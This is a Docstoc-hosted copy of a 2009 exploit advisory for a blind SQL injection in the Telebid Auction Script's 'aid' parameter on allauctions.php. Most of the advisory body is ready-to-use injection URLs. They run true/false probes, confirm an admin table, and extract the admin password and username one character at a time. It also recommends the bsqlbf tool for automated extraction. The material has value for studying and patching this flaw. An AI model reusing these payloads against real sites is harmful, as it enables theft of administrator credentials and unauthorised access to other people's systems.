Docstoc

TelebidAuctionScriptaid Blind SQL Injection Vulnerability

Document Sample
TelebidAuctionScriptaid Blind SQL Injection Vulnerability Powered By Docstoc
					                           TelebidAuctionScriptaid Blind SQL Injection Vulnerability                               Page 1/1
  1    TelebidauctionScript(aid) Blind SQL Injection Vulnerability
  2    ____________________________________
  3
  4    Author : Hussin X
  5
  6    Home : www.IQ−TY.com
  7
  8    email : darkangel_g85@Yahoo.com
  9
  10   ____________________________________
  11
  12   Vendor : http://www.telebidauctionscript.com/
  13
  14   Demo :
  15   _______
  16
  17
  18   http://server/allauctions.php?aid=2+and+1=1 (true)
  19
  20
  21   http://server/allauctions.php?aid=2+and+1=0 (false )
  22
  23
  24   :: Table ::
  25
  26   http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
  27
  28
  29   :: column pass and username ::
  30
  31   http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
  32
  33   http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
  34
  35   note : Use the "bsqlbf" to write detailed information
  36
  37   Greetz
  38   WwW.IQ−ty.CoM , Tryag.cc
  39
  40   | CraCkEr | Cyber−Zone | str0ke | jiko




Hussin X                                                                                                           11/17/2009

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:102
posted:5/24/2010
language:English
pages:1